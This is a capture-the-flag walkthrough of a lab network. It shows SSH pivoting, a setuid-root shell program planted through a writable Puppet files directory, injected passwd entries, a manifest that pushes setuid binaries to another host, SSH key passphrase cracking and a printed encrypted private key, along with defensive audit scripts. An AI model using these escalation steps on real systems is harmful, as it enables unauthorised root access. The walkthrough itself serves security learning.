System information disabled due to load higher than 1.0


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

sandieshaw@puppet:~$ id
uid=1000(sandieshaw) gid=1000(sandieshaw) groups=1000(sandieshaw),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
sandieshaw@puppet:~$

We nmap scan 192.168.122.2 and find that port 8140 has a WEBrick web server on it. The victim machine does not currently have proxychains installed, but since we're root, why not install it.

apt-get install proxychains

ssh -f -N -D 7171 sandieshaw@192.168.122.2

root@analoguepond:~# ssh -f -N -D 7171 sandieshaw@192.168.122.2
+-----------------------------------------------------------------------------+
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
| most famous song |
+-----------------------------------------------------------------------------+
sandieshaw@192.168.122.2's password:
root@analoguepond:~# netstat -antplu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.168.122.1:53 0.0.0.0:* LISTEN 1192/dnsmasq
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 915/sshd
tcp 0 0 127.0.0.1:7171 0.0.0.0:* LISTEN 6977/ssh
tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN 1199/qemu-system-x8
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 1233/qemu-system-x8
tcp 0 0 192.168.1.249:22 192.168.1.66:52436 ESTABLISHED 5314/sshd: eric [pr
tcp 0 0 192.168.1.249:22 192.168.1.66:52696 ESTABLISHED 5533/sshd: eric [pr
tcp 0 0 192.168.1.249:22 192.168.1.66:52422 ESTABLISHED 5276/sshd: eric [pr
tcp 0 0 192.168.1.249:22 192.168.1.66:52544 ESTABLISHED 5475/sshd: eric [pr
tcp 0 0 192.168.122.1:50416 192.168.122.2:22 ESTABLISHED 6977/ssh
tcp 0 0 192.168.1.249:22 192.168.1.66:52920 ESTABLISHED 6541/sshd: eric [pr
tcp 0 0 192.168.122.1:40201 192.168.122.2:22 ESTABLISHED 6532/ssh
tcp6 0 0 :::22 :::* LISTEN 915/sshd
tcp6 0 0 ::1:7171 :::* LISTEN 6977/ssh
udp 0 0 0.0.0.0:42984 0.0.0.0:* 976/snmpd
udp 0 0 192.168.122.1:53 0.0.0.0:* 1192/dnsmasq
udp 0 0 0.0.0.0:67 0.0.0.0:* 1192/dnsmasq
udp 0 0 0.0.0.0:68 0.0.0.0:* 662/dhclient
udp 12480 0 0.0.0.0:41040 0.0.0.0:* 662/dhclient
udp 0 0 0.0.0.0:161 0.0.0.0:* 976/snmpd
udp6 0 0 ::1:161 :::* 976/snmpd
udp6 0 0 :::39304 :::* 662/dhclient
root@analoguepond:~#

Now we should be able to reach the new host (I hope).

We open Firefox and set up a SOCKS proxy with host 127.0.0.1 and our ssh port 7070.
Then we open https://192.168.122.2:8140/ and we can reach the website on the inner server.

The environment must be purely alphanumeric, not ''

https://192.168.122.2:8140/0x27
The indirection name must be purely alphanumeric, not ''

Will come back to this, after I think a bit more on ideas.

  642. As of now, we should start enumerating what is here, as we also have sandieshaws login over ssh. Lets look for the web files.
  643.  
  644. sandieshaw@puppet:/tmp$ cat /etc/passwd
  645. root:x:0:0:root:/root:/bin/bash
  646. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  647. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  648. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  649. sync:x:4:65534:sync:/bin:/bin/sync
  650. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  651. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  652. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  653. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  654. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  655. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  656. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  657. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  658. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  659. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  660. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  661. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  662. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  663. libuuid:x:100:101::/var/lib/libuuid:
  664. syslog:x:101:104::/home/syslog:/bin/false
  665. messagebus:x:102:106::/var/run/dbus:/bin/false
  666. landscape:x:103:109::/var/lib/landscape:/bin/false
  667. sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
  668. sandieshaw:x:1000:1000:Sandra Ann Goodrich,,,:/home/sandieshaw:/bin/bash
  669. puppet:x:105:112:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
  670. sandieshaw@puppet:/tmp$
  671.  
  672. #lets update our hosts file again.
  673. 192.168.1.249 analoguepond
  674. 192.168.122.2 puppet.example.com
  675. 192.168.122.3 barringsbank.example.com
  676.  
  677.  
  678. quick reminders:
  679. VNC Port forwarding through tunnel:
  680. ssh -L 5901:127.0.0.1:5901 -N -f -l eric 192.168.1.249
  681. ssh -L 5900:127.0.0.1:5900 -N -f -l eric 192.168.1.249
  682.  
  683.  
  684. Dynamic ssh tunnel for proxy chains
  685. ssh -f -N -D 7070 eric@192.168.1.249
  686.  
  687.  
  688. while SSH'ed into 192.168.1.249
  689. ssh sandieshaw@192.168.122.2
  690. puppetonastring
  691.  
  692. from within 192.168.1.249
  693. apt-get install nmap
  694. nmap -sC -sV -T5 -v -p- --script vuln 192.168.122.3
  695.  
  696. Nmap scan report for barringsbank.example.com (192.168.122.3)
  697. Host is up (0.0048s latency).
  698. Not shown: 65534 closed ports
  699. PORT STATE SERVICE VERSION
  700. 22/tcp open tcpwrapped
  701.  
  702.  
703. In /tmp on sandieshaw's box there is a program called spin; when run, it draws a spinning symbol on the screen. After copying it out to our machine and running strings, we see lots of function names but no clue what they do. So we browse the system and find another spin file, at /etc/puppet/wiffle/files/spin, together with its spin.c source.
  704.  
705. We place a bash script named spin in this directory, then wait, and later find that our shell script has been moved to /tmp as /tmp/spin, owned by root with the setuid bit set. However, it doesn't give us a shell: the kernel ignores the setuid bit on interpreted scripts (the interpreter is started as the caller), so it runs in the same limited user context as us.
  706.  
707. We try another method using a C program as follows.
  708.  
709. #gcc -D_GNU_SOURCE root.c -o spin   (so <unistd.h> declares setresuid)
710. #include <stdlib.h>
711. #include <unistd.h>
712. /* puppet installs this setuid root; setresuid() sets real, effective and saved uid to 0 (the gid stays 1000) */
713. int main(void){ setresuid(0, 0, 0); system("/bin/bash"); return 0; }
  714.  
715. We compile locally, move the binary to eric and then down to sandieshaw. We place it back in the /etc/puppet/wiggle/files/ directory as spin, and then wait until puppet
716. copies it back to /tmp again. This time around, it executes our setuid call and spawns us a shell as root!
  717.  
  718. :)
  719.  
  720. sandieshaw@puppet:/tmp$ ls -la
  721. total 24
  722. drwxrwxrwt 2 root root 4096 Apr 26 08:30 .
  723. drwxr-xr-x 22 root root 4096 Jan 7 11:45 ..
  724. -rwsr-xr-x 1 root root 8688 Apr 26 08:30 spin
  725. -rwxrwxr-x 1 sandieshaw sandieshaw 22 Apr 26 07:32 uname
  726. sandieshaw@puppet:/tmp$ spin
  727. root@puppet:/tmp# id
  728. uid=0(root) gid=1000(sandieshaw) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(sandieshaw)
  729. root@puppet:/tmp#
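The escalation above works because of two things on the puppet master: the served directory under a module's files/ tree was writable by a low-privileged account, and the manifest installed whatever was there with a setuid mode. The following is an added example, not code from the walkthrough or from the CTF, that audits a module tree for both conditions and lists setuid files an agent run has dropped into /tmp. The module path, file names and manifest text in the fixture are assumptions (the CTF master kept its modules under /etc/puppet); the demo builds its own throwaway tree instead of touching a real one.

```python
"""Audit a Puppet module tree for writable served files and setuid modes."""
import os
import re
import stat
import tempfile

# `mode => 4755`, `mode => '4755'`, `mode => "04755"`: a leading 2-7 in a
# four-digit mode means setgid and/or setuid is set (1 would be sticky only).
SUID_MODE_RE = re.compile(r"""mode\s*=>\s*["']?0?[2-7][0-7]{3}["']?""")


def writable_by_others(path):
    """True if group or world has write permission on the file."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_modules(modules_dir):
    """Return (writable served files, (manifest, line, text) setuid hits)."""
    writable, suid_hits = [], []
    for dirpath, _dirs, files in os.walk(modules_dir):
        rel = os.path.relpath(dirpath, modules_dir).split(os.sep)
        served = len(rel) >= 2 and rel[1] == "files"  # <module>/files/... is served via puppet:///modules/
        for name in files:
            path = os.path.join(dirpath, name)
            if served and writable_by_others(path):
                writable.append(path)
            if name.endswith(".pp"):
                with open(path, errors="replace") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if SUID_MODE_RE.search(line):
                            suid_hits.append((path, lineno, line.strip()))
    return writable, suid_hits


def setuid_files(directory):
    """Setuid/setgid regular files below a directory, e.g. /tmp after an agent run."""
    hits = []
    for dirpath, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return hits


def build_sample_tree():
    """Constructed fixture (assumed layout): a group-writable spin under vulnhub/files,
    an init.pp with mode => 4755, and a setuid spin already dropped into a tmp dir."""
    modules = tempfile.mkdtemp(prefix="modules-")
    tmp = tempfile.mkdtemp(prefix="agent-tmp-")
    os.makedirs(os.path.join(modules, "vulnhub", "files"))
    os.makedirs(os.path.join(modules, "vulnhub", "manifests"))
    spin = os.path.join(modules, "vulnhub", "files", "spin")
    with open(spin, "w") as fh:
        fh.write("placeholder for the compiled root.c\n")
    os.chmod(spin, 0o664)
    with open(os.path.join(modules, "vulnhub", "manifests", "init.pp"), "w") as fh:
        fh.write('file { "/tmp/roots":\n  ensure => "directory",\n'
                 '  mode   => 4755,\n  source => "puppet:///modules/vulnhub/roots",\n}\n')
    dropped = os.path.join(tmp, "spin")
    with open(dropped, "w") as fh:
        fh.write("placeholder\n")
    os.chmod(dropped, 0o4755)
    return modules, tmp


def demo():
    """Run both audits over the fixture; returns paths relative to the fixture roots."""
    modules, tmp = build_sample_tree()
    writable, suid_hits = audit_modules(modules)
    return {
        "writable": [os.path.relpath(p, modules) for p in writable],
        "suid_manifest_lines": [(os.path.relpath(p, modules), n) for p, n, _ in suid_hits],
        "setuid_in_tmp": [os.path.relpath(p, tmp) for p in setuid_files(tmp)],
    }


if __name__ == "__main__":
    print(demo())
```

On a real master, call audit_modules("/etc/puppet/modules") and setuid_files("/tmp") on each agent; any hit in the first list that is not owned and written only by root is exactly the foothold used here.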
  730.  
731. We go to /root and have a look around.
  732.  
  733. ./protovision:
  734. total 24K
  735. 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 .
  736. 4.0K drwx------ 4 root root 4.0K Jan 7 17:49 ..
  737. 4.0K -rw-r--r-- 1 root root 401 Dec 21 22:15 flag1.txt.0xff
  738. 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 .I_have_you_now
  739. 4.0K -rw-r--r-- 1 root root 39 Dec 17 12:51 jim
  740. 4.0K -rw-r--r-- 1 root root 53 Dec 17 12:51 melvin
  741.  
  742. ./protovision/.I_have_you_now:
  743. total 84K
  744. 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 .
  745. 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 ..
  746. 4.0K drwxr-xr-x 3 root root 4.0K Dec 18 15:29 .a
  747. 72K -r-------- 1 root root 71K Dec 18 15:23 grauniad_1995-02-27.jpeg
  748.  
  749.  
  750. ./protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z:
  751. total 16K
  752. 4.0K drwxr-xr-x 2 root root 4.0K Dec 21 23:20 .
  753. 4.0K drwxr-xr-x 3 root root 4.0K Dec 18 18:42 ..
  754. 4.0K ---x------ 1 root root 7 Dec 18 15:34 my_world_you_are_persistent_try
  755. 4.0K -rw-r--r-- 1 root root 1.4K Dec 21 22:10 nleeson_key.gpg
  756.  
  757. less /root/protovision/flag1.txt.0xff
  758.  
  759.  
  760. root@puppet:/root# cat /root/protovision/jim /root/protovision/melvin /root/protovision/flag1.txt.0xff
  761. Mr Potato Head! Backdoors are not a...
  762. Boy you guys are dumb! I got this all figured out...
  763. 3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
  764. root@puppet:/root#
  765.  
  766. cat flag1.txt.0xff
  767. 3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
  768. root@kali:/mnt/HDD2/ctf/analouge-pond# cat flag1.txt.0xff | xxd -r -p | rev | base64 -d
  769. https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...
  770.  
  771. root@kali:/mnt/HDD2/ctf/analouge-pond#
  772.  
  773.  
  774. ssh root@192.168.122.3
  775. ssh_exchange_identification: read: Connection reset by peer
  776.  
777. We edit /etc/hosts.deny, which is blocking inbound ssh connections on barringsbank: sshd on this Ubuntu release is linked against TCP wrappers, so a denied client is accepted and immediately dropped before the version banner, which is the "tcpwrapped" nmap reported and the "Connection reset by peer" seen above.
  778.  
  779. known_hosts on puppet /root/.ssh - |1|qEUhT3+BE6VMnDOqXiC0QTUVaE0=|AntYS4Su9EBESzdihQO62CZgc0A= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLcUc6YYOlbXM7YzsXo/GDT3C2mwx6H8lsBPbKVr+6HBAfdJXpCXSiDh0II3Ie0j2y4e2fjV+x1yHeGVUi3Lff8=
  780.  
781. Eventually we find that the .3 server is controlled through the puppet scripts in /etc/puppet/modules/vulnhub/files.
  782.  
783. We edit the sshd settings to allow root login, with no password, and as an allowed user, and also disable the PAM requirement. We need to wait until the next puppet agent run pushes the files (hopefully).
  784.  
785. We also edit the hosts.deny file so sshd accepts our connections. We know sandieshaw was allowed to log in via the scripts, so let's try her first.
  786.  
787. We copy sandieshaw's entry from puppet-passwd over to barringsbank-passwd as well, giving us (in theory) an account on the system with the password "password"; the MD5-crypt hash goes directly into the password field of the passwd line:
  788. openssl passwd -1 -salt xyz password
  789. $1$xyz$cEUv8aN9ehjhMXG/kSFnM1
  790.  
  791. sandieshaw:$1$xyz$cEUv8aN9ehjhMXG/kSFnM1:1000:1000:Sandra Ann Goodrich,,,:/home/sandieshaw:/bin/bash
  792.  
  793. ssh sandieshaw@192.168.122.3
  794.  
  795. ssh sandieshaw@192.168.122.3
  796. sandieshaw@192.168.122.3's password:
  797. Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)
  798.  
  799. * Documentation: https://help.ubuntu.com/
  800.  
  801. System information as of Wed Apr 26 06:47:18 BST 2017
  802.  
  803. System load: 5.81 Memory usage: 4% Processes: 106
  804. Usage of /: 72.3% of 1.59GB Swap usage: 0% Users logged in: 0
  805.  
  806. Graph this data and manage this system at:
  807. https://landscape.canonical.com/
  808.  
  809. 173 packages can be updated.
  810. 103 updates are security updates.
  811.  
  812. New release '16.04.2 LTS' available.
  813. Run 'do-release-upgrade' to upgrade to it.
  814.  
  815.  
  816. The programs included with the Ubuntu system are free software;
  817. the exact distribution terms for each program are described in the
  818. individual files in /usr/share/doc/*/copyright.
  819.  
  820. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
  821. applicable law.
  822.  
  823.  
  824. The programs included with the Ubuntu system are free software;
  825. the exact distribution terms for each program are described in the
  826. individual files in /usr/share/doc/*/copyright.
  827.  
  828. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
  829. applicable law.
  830.  
  831. Could not chdir to home directory /home/sandieshaw: No such file or directory
  832. nleeson@barringsbank:/$
  833.  
  834.  
  835.  
836. that's a nice feeling :)
  837.  
838. We probably should have put the hash on the nleeson entry instead, but let's just play with the system for now. The prompt says nleeson because the injected line reused uid 1000, which barringsbank already assigns to nleeson; the shell resolves uid 1000 to the first matching passwd entry, so we are effectively nleeson, and sandieshaw's home directory doesn't exist.
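The passwd tampering above leaves two loud traces: a second entry sharing uid 1000, and a hash sitting in the password field instead of the shadow placeholder "x". The following is an added example, not code from the walkthrough, that parses passwd(5) text, reproduces the first-match uid lookup that made the prompt read nleeson, and reports both anomalies. SAMPLE_PASSWD is constructed from lines quoted on this page; the nleeson line itself is assumed (only its uid, 1000, is confirmed by the netstat output above).

```python
"""Checks for injected /etc/passwd entries: duplicate uids and inline hashes."""
from collections import namedtuple

PasswdEntry = namedtuple("PasswdEntry", "name passwd uid gid gecos home shell")

# Constructed sample: root/daemon/sandieshaw lines are quoted on this page,
# the nleeson line is an assumption (its uid 1000 is confirmed above).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nleeson:x:1000:1000:,,,:/home/nleeson:/bin/bash
sandieshaw:$1$xyz$cEUv8aN9ehjhMXG/kSFnM1:1000:1000:Sandra Ann Goodrich,,,:/home/sandieshaw:/bin/bash
"""

# Password-field values that do not themselves grant a login.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Parse passwd(5) text into entries; malformed lines raise ValueError."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("line %d: expected 7 fields, got %d" % (lineno, len(fields)))
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell))
    return entries


def first_name_for_uid(entries, uid):
    """What getpwuid() (and so a shell prompt) resolves a uid to: the first match."""
    for e in entries:
        if e.uid == uid:
            return e.name
    return None


def audit_passwd(entries):
    """Return (kind, user, detail) findings for suspicious entries."""
    findings = []
    seen_uid = {}
    for e in entries:
        if e.uid in seen_uid:
            findings.append(("duplicate-uid", e.name,
                             "uid %d already belongs to %s" % (e.uid, seen_uid[e.uid])))
        else:
            seen_uid[e.uid] = e.name
        if e.passwd == "":
            findings.append(("empty-password", e.name, "passwordless login"))
        elif e.passwd not in SHADOWED_OR_LOCKED:
            # Real hashes belong in /etc/shadow; passwd is world-readable.
            findings.append(("hash-in-passwd", e.name,
                             "hash in world-readable passwd (prefix %s)" % e.passwd[:3]))
        if e.uid == 0 and e.name != "root":
            findings.append(("uid0-alias", e.name, "second uid 0 account"))
    return findings


if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print("uid 1000 resolves to", first_name_for_uid(entries, 1000))
    for kind, user, detail in audit_passwd(entries):
        print(kind, user, detail)
```

Run it against a copy of the agent's /etc/passwd (or the barringsbank-passwd file on the master) to see what a puppet run is about to install before it lands.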
  839.  
  840. nleeson@barringsbank:/home/nleeson$ netstat -antplu
  841. (No info could be read for "-p": geteuid()=1000 but you should be root.)
  842. Active Internet connections (servers and established)
  843. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  844. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
  845. tcp 0 0 192.168.122.3:22 192.168.122.2:35430 ESTABLISHED -
  846. tcp6 0 0 :::22 :::* LISTEN -
  847. udp 0 0 0.0.0.0:68 0.0.0.0:* -
  848. udp 0 0 0.0.0.0:31345 0.0.0.0:* -
  849. udp6 0 0 :::14309 :::* -
  850. nleeson@barringsbank:/home/nleeson$
  851.  
852. No web server is running.
  853.  
  854. nleeson@barringsbank:/home/nleeson$ cat /etc/issue /etc/*ele*;uname -a
  855. Ubuntu 14.04.3 LTS \n \l
  856.  
  857. DISTRIB_ID=Ubuntu
  858. DISTRIB_RELEASE=14.04
  859. DISTRIB_CODENAME=trusty
  860. DISTRIB_DESCRIPTION="Ubuntu 14.04.3 LTS"
  861. NAME="Ubuntu"
  862. VERSION="14.04.3 LTS, Trusty Tahr"
  863. ID=ubuntu
  864. ID_LIKE=debian
  865. PRETTY_NAME="Ubuntu 14.04.3 LTS"
  866. VERSION_ID="14.04"
  867. HOME_URL="http://www.ubuntu.com/"
  868. SUPPORT_URL="http://help.ubuntu.com/"
  869. BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
  870. Linux barringsbank 4.4.0-57-generic #78~14.04.1-Ubuntu SMP Sat Dec 10 00:14:47 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
  871.  
872. We're going to put our setuid root.c program onto the new host via the puppet init.pp:
  873.  
874. ## w00t for r00t: recurse copies everything under the module's roots/ directory to /tmp/roots on the agent, and mode is applied to those files too, so the compiled spin binary lands setuid root
875. file { "/tmp/roots":
876.   ensure  => "directory",
877.   recurse => true,
878.   purge   => true,
879.   force   => true,
880.   owner   => root,
881.   group   => root,
882.   mode    => "4755",   # quoted: Puppet expects file modes as strings
883.   source  => "puppet:///modules/vulnhub/roots",
884. }
  885.  
  886. apt-get install nano
  887.  
888. We add this to init.pp on the puppet master (sandieshaw's server), then wait and see whether it shows up in /tmp on the nleeson server.
  889.  
  890. and, we are grooooooot..er, I am root.
  891.  
  892. /etc/shadow
  893. nleeson:$6$sspRmsSA$fD6XXOHUcf1UniBIAuGcFnJ4Qz49IlIdweutehpNDdTk9u9mAeAej9ToMUDrh3af/nsYQ787eXbKFTZpRtRSN/:17150:0:99999:7:::
  894.  
  895. web server process on eric? /usr/lib/ruby/vendor_ruby/puppet/application/master.rb
  896.  
  897. root@puppet:/usr/lib/ruby/vendor_ruby/puppet/network/http/rack# cat /etc/puppet/puppet.conf
  898. [main]
  899. logdir=/var/log/puppet
  900. vardir=/var/lib/puppet
  901. ssldir=/var/lib/puppet/ssl
  902. rundir=/var/run/puppet
  903. factpath=$vardir/lib/facter
  904. templatedir=$confdir/templates
  905. prerun_command=/etc/puppet/etckeeper-commit-pre
  906. postrun_command=/etc/puppet/etckeeper-commit-post
  907. certname=puppet.example.com
  908.  
  909. [master]
  910. # These are needed when the puppetmaster is run by passenger
  911. # and can safely be removed if webrick is used.
  912. ssl_client_header = SSL_CLIENT_S_DN
  913. ssl_client_verify_header = SSL_CLIENT_VERIFY
  914. dns_alt_names = puppet, puppet.example.com
  915.  
  916. [agent]
  917. server = puppet.example.com
  918.  
  919.  
  920. root@puppet:/etc/puppet# cat fileserver.conf
  921. # This file consists of arbitrarily named sections/modules
  922. # defining where files are served from and to whom
  923.  
  924. # Define a section 'files'
  925. # Adapt the allow/deny settings to your needs. Order
  926. # for allow/deny does not matter, allow always takes precedence
  927. # over deny
  928. [files]
  929. path /etc/puppet/files
  930. # allow *.example.com
  931. # deny *.evil.example.com
  932. # allow 192.168.0.0/24
  933.  
  934. [plugins]
  935. # allow *.example.com
  936. # deny *.evil.example.com
  937. # allow 192.168.0.0/24
  938. root@puppet:/etc/puppet#
  939.  
  940. nleeson_key.gpg
  941. root@puppet:~/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z#
  942. gpg -d nleeson_key.gpg
  943. gpg: CAST5 encrypted data
  944. gpg: gpg-agent is not available in this session
  945. gpg: encrypted with 1 passphrase
  946. -----BEGIN RSA PRIVATE KEY-----
  947. Proc-Type: 4,ENCRYPTED
  948. DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16
  949.  
  950. RTSpHZnf1Onpy3OHfSat0Bzbrx8wd6EBKlbdZiGjEB0AC4O0ylrSBoWsEJ/loSL8
  951. jdTbcSG0/GWJU7CS5AQdK7KctWwqnOHe9y4V15gtZcfgxNLrVfMUVAurZ3n2wQqK
  952. ARmqBXhftPft8EBBAwWwQmBrD+ufF2uaJoKr4Bfu0zMFQxRnNDooBes5wyNO/7k6
  953. osvGqTEX/xwJG1GB5X0jsDCmBH4WXhafa0nzZXvd2Pd3UpaWPEgyq3vxIQaredR8
  954. VbJbPSeKypTIj3UyEj+kjczhCiWw9t0Mv0aV4FtMOesnDQYJskL8kSLGRkN+7lHD
  955. IcHz7az9oqYGBSq77lPkmk7oIpT/pg80pfCyHExROwlTRPzVRHv7KGiKd35R0Hl9
  956. 7CUQPCjH5ltQW4B6XUmxmoT8N14w5HOxb/JlV7s2g6dXYT0azOeqDsGivpgMY3vy
  957. rtVakLIsZeYaZYSr6WvTFclXWYctYPMgzRewiRPjyn6DXiD6MtCJZj2CqJ47tP37
  958. eRRgRRH6a1Sm/BkfSPIXlV0tTpOXfjtHG7VoIc5X343GL/WHM/nhNFvMLdRnVXRM
  959. YOEKAsYklBLqZ99btTESwJZt9HG/cGpQrbgFwxKPoJy7f5wNLOa1ZhpDyw1IqokO
  960. Pq4r8zZj4ASyg3gl7ByG11C272mkMG8yiIwOckVgNec/se18PUGBw1HHgRuyzDym
  961. /6/cwkDzoJlResjsNDQCQcNzSOoZxi3GFIIiB+HjG84MF+ofnn3ayaUZLUaBbPMJ
  962. jQ7dP6wqIMYwY5ZM6nRQ+RnL6QVBHnXH9RjmbzdVMzmQDjPS0lOg5xkU8B78vG6e
  963. lphvmlLSM+PFVOqPwhVB8yon97aU23npKIOPu44VsUXU0auKI94qoX0I1EDDQFrE
  964. UqpWUpCCHrRRTZCdnnE6RnJZ+rjGPvFA95lhUp1fpF8l4U3a8qKlsdtWmzYxHdyg
  965. +w0QE8VdDsNqgCP7W6KzvN5E5HJ0bbQasadAX5eDd6I94V0fCZrPlzM+5CAXH4E4
  966. qhmWQPCw7Q1CnW61yG8e9uD1W7yptK5NyZpHHkUbZGIS+P7EZtS99zDPh3V4N7I2
  967. Mryzxkmi2JyQzf4T1cfK7JTdIC2ULGmFZM26BX3UCV0K+9OOGgRDPU4noS0gNHxP
  968. VaWVmjGgubE4GDlW0tgw1ET+LaUdAv/LE+3gghpRLn1imdaW9elnIeaVeOWcyrBC
  969. Ypl8AjYXNRd0uLWBC8xbakmK1tZUPXwefqjQpKjuIuYmmVes3M4DFxGQajmK03nO
  970. oGaByHu0RVjy0x/zBuOuOp6eKpeaiLWfLM5DSIWlksL/2dmAloSs3LrIPu4dTnRb
  971. v2YQ+72nLI62alLEaKwXUBoHSSRNTv0hbOyvV8YUp4EmJ8yShAmEE/n9Et62BwYB
  972. rsi0RhEfih+43PzlwB91I4Elr2k3eBwQ9XiF3KdVgj6wvwqNLZ7aC5YpLcYaVyNT
  973. fKzUxX02Ejvo60xWJ8u6GIhUK404s2WVeG/PCLwtrKGjpyPCn3yCWpCWpGPuVNrx
  974. Wg0Um581e4Vw5CLDL5hRLmo7wiqssuL3/Uugf/lc2vF+MxJyoI1F9Zkt2xvRYrLB
  975. -----END RSA PRIVATE KEY-----
  976. gpg: WARNING: message was not integrity protected
  977.  
  978.  
979. Verified that the key passphrase is joshua:
  980. john hashes
  981. Using default input encoding: UTF-8
  982. Loaded 1 password hash (SSH [RSA/DSA 32/64])
  983. Press 'q' or Ctrl-C to abort, almost any other key for status
  984. joshua (nleeson_key.key)
  985. 1g 0:00:00:00 DONE 2/3 (2017-04-26 11:40) 10.00g/s 123620p/s 123620c/s 123620C/s joshua
  986. Use the "--show" option to display all of the cracked passwords reliably
  987. Session completed
  988.  
  989. root@analoguepond:/home# ssh -i rsa.key nleeson@192.168.122.3
  990. Enter passphrase for key 'rsa.key':
  991. Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)
  992.  
  993. * Documentation: https://help.ubuntu.com/
  994.  
  995. System information as of Wed Apr 26 14:57:54 BST 2017
  996.  
  997. System load: 0.0 Processes: 109
  998. Usage of /: 72.4% of 1.59GB Users logged in: 0
  999. Memory usage: 8% IP address for eth0: 192.168.122.3
  1000. Swap usage: 0%
  1001.  
  1002. Graph this data and manage this system at:
  1003. https://landscape.canonical.com/
  1004.  
  1005. 173 packages can be updated.
  1006. 103 updates are security updates.
  1007.  
  1008. New release '16.04.2 LTS' available.
  1009. Run 'do-release-upgrade' to upgrade to it.
  1010.  
  1011.  
  1012. The programs included with the Ubuntu system are free software;
  1013. the exact distribution terms for each program are described in the
  1014. individual files in /usr/share/doc/*/copyright.
  1015.  
  1016. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
  1017. applicable law.
  1018.  
  1019. nleeson@barringsbank:~$
  1020.  
  1021.  
  1022. so far I have:
  1023. - Troll Flag - flag.txt
1024. - Flag1.txt.0xff, which gave us the hint for the password "secret" to decode the gpg file
1025. > - Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am. < reference for secret/wargames
1026. - ssh-rsa key passphrase joshua (which was also given as a hint on the same server from which we got flag1)
1027. - root on eric, sandie and nleeson
  1028.  
  1029. Todo:
  1030. - vnc passwords on eric 5900 and 5901
